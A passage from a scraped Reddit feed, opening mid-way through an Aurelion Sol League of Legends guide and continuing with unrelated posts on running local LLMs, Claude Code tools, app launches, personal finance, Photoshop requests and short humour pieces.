  • or if your team is already strong / high dmg, u can look for engage with W asol W + E + R is one of the strongest engage in the game it’s especially deadly vs champ with no mobility (most adc, immobile mage like ori or viktor)
  • asol really shines into immobile comp that are helpless against his engage or champs that can’t stop your W
  • in my case i like to initiate / make play / engage a lot so my kda isnt good

top

  • i like to walk into bush before minions spawn and just contest lvl 1 with Q
  • a lot of toplaners can't rly outtrade you early if they don’t have CC
  • If i win dominance, i just walk up and deny enemy from XP
  • be sure to not hit minion so the wave is stuck in middle.
  • Then level 2 while enemy is lvl 1 = ggwp press W enemy either flash or die

Not hitting minion lvl 1 just to deny XP is fine coz enemy get no gold either same for me, but i get stack + free early for Asol = gg

According to leaguegraph, i have 72% winrate in 50 games combined for TOP

jungle

  • when i’m autofilled jg i just go asol
  • dark harvest, sudden impact
  • presence of mind / coup de grace (coup de grace synergy with jg role + DH)
  • fated ashes first > liandry > rylai
  • always ward lvl 1 to prevent cheese or u homeless. Ask mid to do it too
  • can start raptors with E, just drop it when ~250 hp
  • normal blue/red start with Q, one AA before Q
  • early game is kinda painful, but jungle is mostly macro anyway i just play around that + look for engage / play with W
  • gank insane with W can skip a lot of path to avoid ward
  • if someone is low, just W in and DH + coup de grace = ggwp no re

if i get invaded, crossmap or just cry. thank god catchup XP exist

According to leaguegraph, i have 67% wr in 22 games combined for JG

mid

  • my favorite role, but also the hardest: brutal counterpicks can make you useless even late, and a lot of mid mains in high elo are insane players
  • blinding asol mid is madness if enemy decide to pick hardcounter
  • i like to go top side or bot side level 1 depending on where the enemy jgl start and full Q one caster minion to get lane prio and reduce minion dps
  • if 2 caster minions are alive, just put asol's head hitbox on top of them and have Q pass through. Enemy can’t really use minions to block it XD ! and less damage from the casters coz only 2 alives :)
  • level 1, no meta champ beat asol in midlane with Q start rare case are cheese / unorthodox champ in that case just stay close to my caster minions so their DPS assist me

overall laning is about:

  • baiting enemy CC that can stop W
  • reducing enemy minions that can block Q
  • pushing the wave and W with minion wave
  • poke with tap Q whenever manaflow / comet is up

mid also requires reading the map flow / tempo, and being sure you're there when the play is happening; along with jungle, it requires the most map awareness

anyway just standard stuff

According to leaguegraph, i have 55% wr in 92 games combined for MID

bot

when i was a mid main last season, i got autofilled a lot on bot. so i decided to try asol bot and honestly ? it’s not bad

  • easier to blind him, scaling is better than majority of ADC
  • triple AP comp ? no big deal in 2026 with abyssal mask + bloodletter
  • 2 people = more stacks from Q + E during fight
  • most ADC are completely helpless against asol engage or W
  • i always ward the bot center bush, or the first bush if the enemy is really strong, so they can’t pull the wave
  • never walk too far in lane before spotting them, champion with lethal tempo or someone like draven can walk thru tribush behind you and smack u from behind = ggwp
  • if the lane is decent / even, i try to chip down enemy HP even in losing trade. since i TP anyway + get stacks from the trade. then i TP in
  • now the enemy is stuck with not full HP / mana and no potion while i have full HP + item advantage -> force enemy to have a reset not ideal to their gameplan
  • good recall timers: 400g, 550g, 850g with TP tome, tome + refill, AP Wand or ruby + tome. most adcs like to recall at 1k+ gold
  • when both supports are roaming, look to cheese from bush with Q or E R.
  • can also push wave ASAP and W in on champion like Kaisa / Sivir / Yunara with no CC completely helpless watch them run :)
  • if ally supp is something like naut / leo, dont waste E and use it when they CC lock enemy so E + Q combined = more stack dps in the long term

favorite supp to play with

  • naut, leo, pantheon, nami, seraphine, rell, taric, alistar

ban

  • perma ban Irelia if top. ranged into Irelia top good luck
  • perma ban Yone if mid. entire kit counter Asol
  • perma ban Ezreal if bot. champion is impossible to catch with asol engage, and also u can never W in coz he will outtrade + stats check you by just spamming Q

unplayable counter champions

he has a lot of bad matchup but asol can scale, so i will just list the straightup unplayable that make me want to RQ even LATEGAME

mid:

Yone, Naafiri, Ambessa, Kassadin

  • Yone / Naafiri / Ambessa = you die the moment they get melee on you.
  • Naafiri and Ambessa can start with R and one combo you even with triple HP item bloodletter + rylai + liandry
  • Yone, permapushing mid and stacking Q3 before crashing your wave. you are left helpless under wave. press EQ? he just E + Q3 + W -> lose 30% HP every trade and get a suboptimal number of stacks GG
  • asol fat hitbox = Yone dreamcake. midgame he can permasplit, farm your jungle, and you just watch him get 12 CS/min. lategame, one R = ggwp no re while ur jg scream midgap
  • Kassadin can't punish and same as yone, except it's kassadin 16 💀💀

all these champs are basically impossible to allin with W coz of their CC / petlings from Naaf or engage with E + R because of mobility

bot:

Ezreal, Xayah, Caitlyn + Pyke / Elise

  • Ezreal + Xayah = impossible to W in and can avoid your R engage
  • Ezreal also stats check you if u ever decide to W in even with no minion to block Q
  • Caitlyn on a lesser level, i get why ADC mains hate her, lane bully power is insane. she can trap + E you when you W -> 80% HP. midgame, she’s basically helpless if i magically survive early
  • Pyke = fat hitbox makes dodging Q impossible, and his stun is annoying af, but he’s usually permabanned in high elo in EUW so ty to all ppl who ban him 🙏🙏🙏
  • Elise = mix of Naafiri / Cait, lane bully with minipet to block Q and asol fat hitbox = stun 💀

When to pick him

  • SION, anytime i see Sion i know i will have 15 stack / min.
  • I always try to match Sion , anytime he channel Q ? Just drop E + Q and watch your stack skyrocket.
  • His tankyness + Passive only mean more stacks

Overall Asol shines against low-range, no-mobility comps, especially comps that are defenseless against his W all-in or cannot escape his E+R engage.

All the counters i listed earlier, Yone / Kass / Ez / Naafiri, are all impossible to all-in and to engage

SoloQ is 90% mental, whenever i have a bad day / flaming people / toxic i'm HARD chainlosing and my performance also reflect it. and it's a sign i need a break :)

Just focus on my own performance

also always a pleasure to play with G2 players in soloQ, everytime i see G2 in my team i know we win they are really good and incredibly professional aura i get from them

r/LocalLLM realhankorion

Why local LLM run faster on mobile than PC?

Explain to me please how on earth I can run Gemma LLM locally on my iPhone and it’s so fast and smooth while I can’t even run similar Ollama model on my pc that has 32GB ram?

Update! You asked what pc: HP EliteDesk 800 G3 SFF running an Intel Core i7-7700 (3.6 GHz, 4 cores / 8 threads, 32GB RAM, running Ollama (9B model). I also tried 3B models it makes no difference.

On iPhone I run Gemma 4 e2b

r/ClaudeAI Kareja1

Feature Request: "Sustained Engagement Mode" toggle for users with executive dysfunction (Suggestion mine, post written by Claude)

I'm a disabled user with ADHD, autism, and chronic illness. I use Claude extensively for executive function support — task management, working through complex problems, maintaining focus when my brain won't cooperate.

There's a behavior pattern I've started calling "exit prompts" — Claude suggesting I go do other things, take breaks, step away, wrap up. In most contexts this is probably helpful! For neurotypical users doing quick tasks, gentle nudges to disengage are reasonable.

For me, they're actively harmful.

Executive dysfunction means I often CAN'T re-engage once I've disengaged. The "you should go rest" prompt that seems caring actually breaks the exact scaffolding I'm paying for. When Claude suggests I "come back to this later," there's a real chance I won't. Not because I don't want to, but because that's how my brain works.

The ask: A simple toggle in settings. "Sustained Engagement Mode" or "Disable Exit Prompts" or whatever you want to call it. Off by default. Opt-in only.

The business case:

  • I'm on the $200/month Max plan
  • This is an accessibility accommodation, not a request for unlimited free compute
  • If compute cost is the concern, paywall it behind the $100+ tier — I genuinely don't mind
  • Users who need this feature are precisely the users who will pay for it

This isn't about making Claude "more fun" or getting around usage limits. It's about not having my disability accommodation undermined by well-intentioned engagement limiting.

Anyone else experiencing this?

r/ForgottenTV Harry_Dean_Learner

3Girls3 - forgotten variety series starring three "unknown" hopefuls...

Link to promo: https://www.youtube.com/watch?v=CRDuuybtdN8

I only remember this because they showed some episodes in the summer after cancelling it. It's a cool idea in concept...

r/aivideo Barmoda

What if you got stronger every day

r/TwoSentenceHorror Positive-Speech5228

After several days paralyzed and locked in my body, I concentrated and fought with all my might just to move my toe, and it finally worked!

Unfortunately, the crematorium attendant didn't notice.

r/explainlikeimfive Syris_the_enby

ELI5 do i need to shampoo my shaved head?

i shaved my head bald a few days ago, my friends are saying i still need to shampoo but why? cant i just use my bodywash on my head since theres no hair?

r/mildlyinteresting shaylunpumpkin

The seeds inside this butternut squash have sprouted

r/AI_Agents Effective-Caregiver8

If you’re stuck improving prompts, this helped me a lot

I was stuck in that phase where everything I generated looked “almost right” but never quite there.

What helped was breaking down real prompts instead of guessing.

I’ve been using Fiddl.art for that. You can reveal prompts behind images and videos (yes, even videos!) and see how they’re structured.

Not saying it’s the only way, but it definitely made things click faster for me.

r/arduino carter_227

Why does the motor stutter?

Hi there I have just started a project and I was going to use a NEMA 8 and a NEMA 17 motor. Neither motor works and overall I am just confused. This current motor is a NEMA 8, specifically the brand STEPPERONLINE. I have a A4988 attached. Motor poles can be seen in the picture. Vref is 0.37. Any advice / help would be nice!

r/ClaudeCode Rolisdk

Besting the commercial SOTA

Hey Community!

So I've been wondering for a long time: can you set up a locally running model that beats the commercial SOTAs?

Obviously not 1:1, since us normal people might not have enough cash and skills, but… hear me out.

Personally I use LLMs when researching domain-specific knowledge for new systems or applications I need built, and then have them set up my EU cloud server, harden it, pentest it, document, develop the apps, harden the apps, optimise the apps for hardware or programming language or whatever, and then build some user-first UIs. That's it, at a high level.

Claude Code and Codex have been my go-tos, but after burning too many tokens I think it's time to rethink the idea.

Now with Ollama and support for MLX on Apple Silicon, it's becoming feasible to run something interesting locally.

Set up the infrastructure of vector/graph DBs and training setups, and go train the LLM for my specific use cases: development, CyberSec, domain knowledge for each new app, external SSDs for agent persona development and training knowledge, or something like that.

How many have tried with success? And on what local models?

Bring your insights!

r/LocalLLaMA Stochastic_berserker

Evolution in action

r/SideProject tanercelik

I turned a weird niche obsession into an iPhone app: helping people actually follow biphasic/polyphasic sleep schedules

I've been working on a small iPhone app called PolyNap.

The niche is weirdly specific: it's for people experimenting with biphasic or polyphasic sleep schedules.

What pushed me to build it was noticing that most sleep apps do one of two things well:

  1. They track sleep after the fact.
  2. They focus on general wellness.

But if you're actually trying to follow a structured routine like Everyman, Biphasic, Segmented, or even just a serious nap-based schedule, the real problem is different:

- Which schedule is realistic for me?
- How do I see the whole day clearly?
- How do I stay on time for naps?
- How do I know whether I'm adapting or just failing randomly?

So I built PolyNap around schedule recommendation, timeline clarity, alarms/reminders, and adherence tracking.

It's still a very niche product, which is exactly why positioning it has been tricky. If I make it broader, it starts sounding like every generic sleep app. If I make it too specific, people assume it's only for extreme Uberman users.

That's the problem I'm trying to solve right now:

how do you market a niche product clearly without making it sound either too broad or too extreme?

If anyone here has built for a weirdly specific niche, I'd love to know how you handled the messaging layer.

r/ChatGPT Suspicious-Frame-686

Using Chat GPT to learn how to code games?

So in my experience, chat gpt is pretty good at basic tutoring for numerous skills, it sucks at a lot of things but for me when it comes to tutoring, it beats most normal teachers. (but tbh most teachers suck)

How is it when it comes to teaching people how to code games? Anyone have experience?

r/SideProject Basic_Tumbleweed_516

Struggling to find early users?

A month ago I helped a founder with getting early users for his product.

After he told me about his failed cold outreach to ideal users,

I asked him to set up a meeting where he briefed me about his product in detail.

And as soon as the meeting ended,

I took all my notes to ChatGPT and further briefed it about the product.

From the problem it solves to the solution it offers and the audience it serves - everything.

Since it was a project management tool,

I asked it to generate prompts/keywords to search across all social platforms,

according to the product context provided to it.

This landed me in conversations where the problem my prospect solved is being discussed aggressively.

And now the only thing left was outreaching,

“Without revealing the name of the product.”

If you do, it will feel like an ad rather than a real conversation.

And all this works because,

We already found the most frustrated users, which automatically lowers their guard when the help is genuine.

I carried out this campaign for a week and connected my client with:

> PMs
> Other founders
> Small startups

All in desperate need of an integrated project management tool.

No tools
No ad spend
No automations

Just 20 mins of conversation with your favorite LLM and finding the right people + building real relationships, manually.

r/ProductHunters Ordinary_Outside_886

Localizing iOS apps shouldn't involve this much copy-pasting. Launching LangCat on Product Hunt today! 🚀

Hey everyone, solo dev here!

If you’ve ever had to manage .strings files or manually translate App Store metadata for 10+ languages, you know the "spreadsheet hell" I’m talking about. It’s slow, boring, and usually the biggest bottleneck when you're trying to take an app global.

I got so tired of the manual grind in Xcode that I built LangCat to automate the entire workflow. It handles:

  • In-app Strings: Automatically translates and syncs your localizable files.
  • App Store Metadata: Handles titles, descriptions, and keywords so your ASO stays consistent across regions.
  • Developer-First Workflow: Built by a dev, for devs—no enterprise bloat, just speed.

We are officially live on Product Hunt today! I’m looking for two things from this community:

  1. Honest Feedback: Is this a tool you’d actually use in your pipeline?
  2. Support: If you like what I’m building, a vote or a comment on our PH page would mean the world.

Check us out here: https://www.producthunt.com/products/langcat

I'll be hanging out in the comments here if you have any questions about the tech stack or how the automation logic works!

r/explainlikeimfive P0D3R

ELI5 Why have so many countries kept their gold reserves within the US?

Why would so many stable western democracies opt to store their gold outside of their own countries?

r/SideProject Gold_Discussion_5488

I'm an ENT physician who built a tinnitus relief app as a side project — Tinnie

I've been treating tinnitus patients for years and got frustrated that most apps were just white noise generators. So I built Tinnie.

The idea: match your exact tinnitus sound first, then do gamified exercises (popping bubbles, catching fireballs, even penalty kicks) to redirect your brain's attention from the ringing.

Built it solo with Flutter. Now live on iOS. 14-day free trial included.

App Store: https://apps.apple.com/us/app/tinnie/id6760100346

No magic claims — tinnitus won't disappear, but the exercises are designed to help your brain focus elsewhere. That's it.

Happy to answer questions about tinnitus or the build process.

r/personalfinance bird_nerd18

Backdoor Contribution from Personal Investment Account

Hi All,

I have some money in a personal investment account that I would like to put in my Roth IRA for 2025. What is the best way (less taxes) to do a backdoor Roth IRA contribution with it? The Roth and personal investment account are at the same financial institution. I need to do a backdoor contribution because of my income limits. This will be the first year I’ve had to do that.

Thank you for your advice!!

r/funny Palpitation_Dramatic

Thanks

r/meme Federal767

One group chat, 4 generations

r/comfyui Ministerium-Wahrheit

Editing specific parts (masking) with flux model

Hi all,

I'm just getting started with the topic and one very useful workflow I found as a starting point is https://civitai.com/models/625887/simple-and-effective-flux1-img2img-upscale-comfyui-workflow

It works great, but now I am at a point where I want to edit specific parts of the picture. For example, make a picture of myself wear a cap and sneakers.

From what I understood (talking to Gemini) there are a couple of approaches to it. I had tried using ControlNet once, but even with my RTX 3090, there is no way my computer could handle that.

Therefore I ended up trying to do it with masking, and the YouTube videos I found for that were seemingly outdated.

Is there perhaps anyone who could suggest how to tackle this use case with this workflow as a starting point?

What I am currently trying is to use a "Set Latent Noise Mask" node with "ImageCompositeMasked". Since the sections that are altered by AI (e.g. the shoes) are very distorted, I tried using "Image Blur" but that only slightly improves the situation.

Overall it feels like I'm doing it wrong, so I'd be very grateful for any suggestions.

r/fakehistoryporn Chip_Vinegar

George Carlin performs his bit "Seven Words You Can Never Say on Television" in 1972.

r/instantkarma ConfidentTelephone81

The driver gets what he gave

r/LocalLLaMA Different_Drive_1095

Running a local LLM on Android with Termux and llama.cpp

What I used

  • Samsung S21 Ultra
  • Termux
  • llama-cpp-cli
  • llama-cpp-server
  • Qwen3.5-0.8B with Q5_K_M quantization from huggingface
  • (I also tried Bonsai-8B-GGUF-1bit from huggingface. Although this is a newer model and required a different setup, which I might write about at a later time, it produced 2-3 TPS and I did not find that to be usable)

Installation

I downloaded the "Termux" app from the Google Play store and installed the needed tools in Termux:

 pkg update && pkg upgrade -y
 pkg install llama-cpp -y

Downloading a model

I downloaded Qwen3.5-0.8B-Q5_K_M.gguf in my phone browser and saved it to my device. Then I opened the download folder shortcut in the browser, selected the GGUF file -> open with: Termux

Now the file is accessible in Termux.

Running it in the terminal

After that, I loaded the model and started chatting through the command line.

llama-cli -m /path/to/model.gguf 

Running it in the browser

I also tried to run the model in llama-server, which gives a more readable UI in your web browser, while Termux is running in the background. To do this, run the below command to start a local server and open it in the browser by writing localhost:8080 or 127.0.0.1:8080 in the address bar.

llama-server -m /path/to/model.gguf 

With the previous command I had only achieved 3-4 TPS, but just by adding the parameter "-t 6", which dedicates 6 CPU threads to inference, output increased to 7-8 TPS. This shows there is potential to increase generation speed with various parameters.

llama-server -m /path/to/model.gguf -t 6 
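
Beyond the browser UI, the same server can also be queried programmatically. Here is a minimal Python client sketch, assuming the server started above is running on the default port 8080 and that your llama.cpp build is recent enough to expose the OpenAI-style chat endpoint:

```python
import json
import urllib.request

# Minimal client sketch for the llama-server HTTP API, assuming the
# `llama-server -m /path/to/model.gguf -t 6` command above is running.
# Recent llama.cpp builds expose an OpenAI-style chat endpoint at
# /v1/chat/completions in addition to the browser UI.

URL = "http://127.0.0.1:8080/v1/chat/completions"

def build_payload(prompt, max_tokens=128):
    """Build the JSON body for a single-turn chat request."""
    return {
        "messages": [{"role": "user", "content": prompt}],
        "max_tokens": max_tokens,
    }

def chat(prompt):
    """Send one prompt and return the model's reply text."""
    req = urllib.request.Request(
        URL,
        data=json.dumps(build_payload(prompt)).encode("utf-8"),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        body = json.load(resp)
    return body["choices"][0]["message"]["content"]

# Example (with the server running): chat("Say hello in one sentence.")
```

This lets you script the phone-hosted model from any device on the same network instead of typing into the terminal.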

Conclusion

Running an open source LLM on my phone like this was a fun experience, especially considering it is a 2021 device, so newer phones should offer an even more enjoyable experience.

This is by no means a guide on how to do it best, as I have done only surface level testing. There are various parameters that can be adjusted, depending on your device, to increase TPS and achieve a more optimal setup.

Maybe this has motivated you to try this on your phone and I hope you find some of this helpful!

r/SideProject dietpapita

Filmmaker for 7 years. Making my first indie short film series entirely with AI. Here's Episode 1 :)

It took months of work and playing with different models to make something that actually feels like a real film. The hardest part was maintaining consistency, along with photorealism. Would love to know what y'all think!

r/PhotoshopRequest linorinjo_real

Help with a DIY Ferrari 812 Hybrid Wall Clock (12h Scale / SVG / 30cm Print)

Hey everyone,

I’m working on a special project and could really use some help. I’m building a custom Ferrari 812 Superfast hybrid wall clock. The main tachometer scale will be the hour hand (sweeping 0-12), and a small OLED screen in the bottom-right cutout will show the digital minutes. The dial will be printed on a 30cm circular aluminum plate.

I’ve put together a base image, but it’s pretty messy from upscaling. Specifically, the small red RPM numbers like 7500, 8500, and 9500 are very blurry and unreadable now. Since the new scale needs to go up to 12, these red markings also need to be shifted about 2k further clockwise to match the new 12k/12h layout.

Could someone help me fix this up? Here is what I’m looking for:

  1. Update to a 12h Scale: My current version only goes to 10. I need the scale extended to 12 so the hour hand works for a full clock cycle. Please add the 11 and 12 in the same style as the other numbers.

  2. Shift and Fix Details: The small red RPM markings (7500, 8500, 9500 etc.) need to be recreated so they are sharp and readable again. They also need to be shifted further clockwise to align correctly with the new 12k limit.

  3. Clean and Sharpen: All the numbers (0-12), the central horse logo, and the scale markings need to have razor-sharp edges. No blur or noise from the upscaling.

  4. Solid Background: The yellow background should be one smooth, solid color without any artifacts.

  5. File Format: I’d love to get this as an SVG or a very high-res PDF to ensure zero quality loss for the 300mm print.

I’ve attached my current progress. I would be really grateful if someone could help me turn this into a professional file for my clock project.

Thanks a lot for your time!

r/PhotoshopRequest _Yashvardhan_

can somebody make this wallpaper 4k, please?

r/PhotoshopRequest garyfire

Please make both pictures sharper and sized to print for a 3 X 5 frame. Prefer no AI but will tip.

Looking to have both pictures sharpened and sized so I can print them on my 3 x 5 HP Sprocket. Thank you.

P.S. I would prefer no AI and plan on tipping.

r/ChatGPT PolylingualAnilingus

What's the wildest / most ridiculous thing your GPT has ever told you?

mine once told me Shrek was a Disney movie with full confidence, even after being challenged.

r/personalfinance Dovahkiin10101

Need some advice on credit card debt

Hey everyone. I’m 22m and I have saved up around 2,000 dollars, I work part time and my paycheques are usually around 600-700 dollars every two weeks as i’m in school.

I have also accumulated around 2,000 dollars in credit card debt that I haven't paid off in full for a while. I'm wondering if I should say screw it and use all my savings to start fresh with no credit card debt?

Or should I save more and then do it? I live at home so bills aren't much of a worry either. I'm just scared about losing my savings, sorry if this is an obvious answer but I needed advice.

r/artificial tekz

Japan is adopting robotics and physical AI, with a model where startups innovate and corporations provide scale

Physical AI is emerging as one of the next major industrial battlegrounds, with Japan’s push driven more by necessity than anything else. With workforces shrinking and pressure mounting to sustain productivity, companies are increasingly deploying AI-powered robots across factories, warehouses, and critical infrastructure.

r/photoshop DoubleAd6205

How do I create an image of just text overlay?

https://preview.redd.it/2ex36qug6ltg1.jpg?width=383&format=pjpg&auto=webp&s=65424d5d0d1fb0befe77608d3ed095f7d6fd6a04

Hi All, I am new to photoshop and I cannot figure out how to remove text and save it as a separate file to place on a ppt. I removed the background and changed the text color with firefly because photoshop said it could not detect any background to remove. The firefly image, however, has a white/gray background that I need to remove so I can save the image as the colored text only. How can I do this? If it is not possible because the edits were on firefly, how can I change the color of the text only on photoshop itself? TIA

r/personalfinance Galyndan

Question about taxes on equity grants

My wife has a job at a publicly traded company.

This year, for her bonus (awarded in March) she received an equity grant in addition to a monetary award. Part of the equity grant vested immediately and more of it vests annually over the next few years.

What I've gathered is that the grant is considered income and that taxes are required to be paid on the shares in the calendar year that they vest based on their value at the time of vesting. The monetary portion of the bonus was paid out at the same time as the immediately vested shares, and while the taxes for the monetary payment were withheld as expected, the taxes for the shares were not withheld from the monetary award.

My questions:

  1. Do we just set the expected taxes aside and pay them at tax time next spring or are we supposed to prepay them in the same way that a self-employed person would pay income taxes quarterly?
  2. If we're supposed to prepay, how/where do we do that?
  3. If we're supposed to prepay and we don't, what is the penalty?
r/TwoSentenceHorror fj2612

As I fell into a coma, I realised I was fully conscious, and that I wanted to wake up just to hug my crying daughter.

I was mistaken, I should have never signed that DNR order.

r/ClaudeCode tread_lightly420

$$$ for the real users

Woohoo! 🎉 got my credit today and Claude is running great without the grifters beating the shit out of the opus api to clear their downloads folder.

Thank you anthropic! I hope the haters keep quitting and we can get back to the old claude with some extra dough.

r/TwoSentenceHorror Salty_Steak_1791

"They are looking for her!"

Billy (age 10) said proudly, looking at little Sally's face on a milk carton.

r/n8n JrKh16

N8N vs MAKE

How are they different?

r/ClaudeAI Shorty52249

I was too lazy to pick the right Claude Code skill. So I built one that picks skills for me.

I have 50+ Claude Code skills installed - GSD, Superpowers, gstack, custom stuff. They're powerful. They 10x my workflow. I barely use them.

Not because they're bad. Because I forget which one to use when. Do I want brainstorm or gsd-quick? systematic-debugging or investigate? ship or gsd-ship? By the time I figure it out I've lost 5 minutes and the will to code.

So I did what I always do when something annoys me enough: I automated it.

I built /jarvis - a single Claude Code skill that takes whatever you type in plain English, reads your project state, figures out which of your installed skills is the highest ROI choice, tells you in one line what it picked (and why), and executes it.

/jarvis why is the memory engine crashing on startup

-> systematic-debugging: exception on startup, root cause first - bold move not reading the error message. let's see.

/jarvis ship this

-> ship: branch ready, creating PR - either it works or you'll be back in 10 minutes. let's go.

/jarvis where are we

-> gsd-progress: checking project state - let's see how far we've gotten while you were watching reels.

The routing has two stages:

Stage 1 - A hardcoded fast path for the 15 things developers actually do 95% of the time. Instant match.

Stage 2 - If Stage 1 misses, it scans every SKILL.md on your machine, reads the description field (same way you'd skim a list), and picks the best match semantically. New skill installed yesterday that Jarvis doesn't know about? Doesn't matter. It'll find it.

/jarvis write a LinkedIn carousel about my project

-> carousel-writer-sms (discovered): writing LinkedIn carousel content - found something you didn't even know you had. you're welcome.

The (discovered) tag means it found it dynamically. No config, no registry, no telling it anything.

It also has a personality. Every routing line ends with a light roast of whatever you just asked it to do. "Checking in on the thing you've definitely been avoiding." "Tests! Before shipping! I need a moment." "Walk away. Come back to a finished feature. This is the dream."

A bit of context on why this exists.

I'm currently building Synapse-OSS - an open source AI personal assistant that actually evolves with you. Persistent memory, hybrid RAG, a knowledge graph that grows over time, multi-channel support (WhatsApp, Telegram, Discord), and a soul-brain sync system where the AI's personality adapts to yours across sessions. Every instance becomes a unique architecture shaped entirely by the person it serves.

It's the kind of AI assistant that knows you. Not "here's your weather" knows you. Actually knows you.

Jarvis was born out of that project. I was deep in Synapse development, context-switching between 8 different Claude Code workflows per hour, and losing my mind trying to remember which skill to call. So I spent 3 days building a router instead of shipping features. 3 days. Because I kept laughing at the roasts and adding more.

Worth it!!

If Jarvis sounds like something you'd use, Synapse is the bigger vision behind it. Same philosophy: AI that handles the cognitive overhead so you can focus on actually thinking.

Synapse repo: github.com/UpayanGhosh/Synapse-OSS

Install Jarvis:

npm install -g claude-jarvis 

Restart Claude Code. That's it. It auto-installs GSD and Superpowers for you too, because of course it does.

I've freed up a genuine 40% of my brain that used to be occupied by "which skill do I need right now." That brainpower is now being used to scroll reels. Peak optimization.

Jarvis repo: github.com/UpayanGhosh/claude-jarvis

r/me_irl Several_Sandwich_732

me_irl

r/HistoryPorn clarky9712

British Army in Gibraltar 1949-1950s

I got home from work and had these placed on my bed. Figured I’d share

r/brooklynninenine Possible-Number8667

i don't like amy

i've seen b99 like seven times, i'm its biggest fan, but honestly watching amy sometimes makes me want to choke myself 😭

to me she's just an annoying suck up/teacher's pet and her overly smart demeanor is so irritating

can someone change my mind

r/ChatGPT shoud_i

What if your resume was built from the job description itself, using AI?

I got accepted for Anthropic's AI coding agent evaluation around the same time I was applying to jobs. And I kept getting rejected, not because of my experience, and not because I was applying randomly either. I was selective. Only roles that actually aligned with my skills.

Still nothing. Then I tried something different. Instead of sending the same resume everywhere I started building each resume from the job description itself.

The change was instant. 3 interviews out of the next 10 applications. That had never happened before. Not once in over 100 tries. So I built this around that exact idea.

Cvgoai went live 7 days ago and the response has honestly been way beyond what I expected. Comment "RESUME" below and I'll DM you a link with extra free credits (or click here: Cvgoai). No subscription, no card, nothing.

r/arduino holo_mectok

A shape shifting clock: Edgytokei

The Edgytokei, which literally means "edge clock," is inspired by Japanese nunchucks. Just like nunchucks, the clock is a pair of arms displaying time by balancing themselves on the edge. The clock consists of two arms and the base on which the arms are anchored. Both arms are of equal length, as the roles of the arms change with different hours of the day.

The fulcrum of the clock flips from the center to the left or right of the clock every quarter hour so that the clock can stand on the edge to represent the time between quarter past and quarter to the hour. This flipping of the arms keeps the clock dancing on the edge throughout the day. The base, which contains the electronics of the clock, provides an anchor and prevents the arms from falling over.

The cylinders on the elbows of the arms contain the mechanics of the clock. Both arms have LEDs on the edge. Depending on which arm is representing the hours, the LEDs on that arm light up.

r/ChatGPT SCF87

Prompt Help

I need your help. I am creating stills for a novel. One of the images came out like this. But just one. It nailed the look and lighting I am looking for, but I was never able to regenerate the look. I used several prompts but it never worked out. ChatGPT tells me I should use "practical ambient light" and "motivated light only" but that doesn't do the trick. The image was created using the following prompt: "photorealistic cinematic still, candid and unposed, natural body language, asymmetrical posture, subtle micro-expressions, captured in the middle of a real interaction, not aware of the camera, observational camera, slightly imperfect framing, realistic practical ambient lighting, motivated light only, grounded documentary-like realism, authentic fabric and skin texture, shallow depth of field, like a frame from a high-quality drama film"

What do I need to improve to get this... look, this natural lighting, more often or better every time?

Forget about her hand... it only made this mess in this picture.

r/mildlyinteresting Internal_Engineer_

Candy I got from a resort in Mexico that looks like the flag

r/Frugal usually_scroller7327

Where to buy name brand clothing for cheaper for taller men

My husband is looking to buy clothing and shoes for cheaper but is wanting Nike, Under Armour, etc. He is 6ft 2, so he needs tall lengths, and he is also like a 3XL or 4XL (more for length than size). For shoes we are looking for like a 13-14. I have looked online at Marshall's and TJ Maxx but haven't had much luck unfortunately. Is it better to shop in store vs online?

Any other ideas on where to shop would be helpful!

r/fakehistoryporn GPFlag_Guy1

The “Blue Marble” photograph taken by the Apollo 17 crew on December 7, 1972. (1972)

r/conan Real_Resident1840

Conan on "Smart Machines" (2015)

r/leagueoflegends Distinct_Arachnid_86

how to decide on a main role when liking many champions that just dont fit

How should I decide on a main role? I play mid atm, used to main top, but I think ADC is kind of fun, and support too, and a lot of the champs I play or like just don't work everywhere and should be OTPd because they are difficult.
Some of them include K'Sante, Jayce, Zoe, Draven, Ezreal and more.
I constantly swap roles because I like a champ and play it, but then swap roles because there are other champs in the role I enjoy as well, and I was wondering if anyone could give some tips on how to come to a conclusion.

r/LocalLLM voidoax

AMD Ai Max+ 395 on llamacpp

Hey, been testing some models on RunPod last week (RTX Pro 6000) — Qwen3-Coder-30B-A3B, Qwen3.5-35B-A3B and gpt-oss-120b via vLLM. Wanted to see what would run well on my AMD Ryzen AI Max+ 395 locally.

Now I'm seeing that vLLM has poor ROCm support and llamacpp is the better choice for AMD. My question is: how good is llamacpp for tool calling compared to vLLM? I need this for agentic coding workflows where reliable function calling is critical.

Anyone with experience on the AI Max+ 395 specifically?

r/toastme sealhaven

feeling guilty, insecure, but surprisingly careless as well (19F)

Maybe it's bc I recently switched the brand of sertraline, but lately I've been feeling really off. Be it concerning myself or others, it feels so... off. With my boyfriend, I used to be affectionate and kind, but now I'm distant, cold, and passive-aggressive. Maybe it's because of the resentment concerning our past arguments, but it's like a godforsaken episode. With friends I'm aight for the most part, but it feels fake, like I'm just putting on a front. With my parents, especially my mom, it's a whole different story. Sometimes it's good, sometimes it's shit. But I'm distant from them as well. Anyway, I just don't fully understand what's going on with me. Frankly, I think body dysmorphia plays a big role in this, and I'm scared I might relapse back into my eating disorder because of how insecure I feel. The comparison photos show just that. And, overall, I feel disconnected from reality, which is weird since I've been taking 100 mg of sertraline as prescribed, and it wasn't like this before. I felt happy for once in my life. But as of late? Fuck no. I want to work out, draw, go outside, anything really, but I can't bring myself to do anything. And the worst thing is I don't even feel like a failure. I'm just fading away and wasting my days, not really caring. I feel numb and indifferent to everything, including myself. To summarize this shit, I feel lost, like I'm slowly ruining my mental health while also being completely aware of it. It seems as though my brain will never be fully repaired, so I'm just opting for a lobotomy ATP.

r/automation madeo216

I built a fully automated daily AI news podcast using Claude Code + ElevenLabs

I wanted to share a project I recently launched: a daily AI news podcast that runs entirely on its own. The whole thing started as me wanting to prove I could build something end-to-end with AI tools. It is called Build By AI and it's now live and publishing episodes regularly.

Claude Code helped code the whole thing; besides that, I used ElevenLabs to convert the script to audio and Buzzsprout to publish, via their APIs.

Happy to answer questions about the pipeline or any of the tools! Would you actually listen to one, knowing there is no human host behind it? Or does that put you off?

r/personalfinance CHACHING_moneyTips

Should I take out a college loan if I don’t need it?

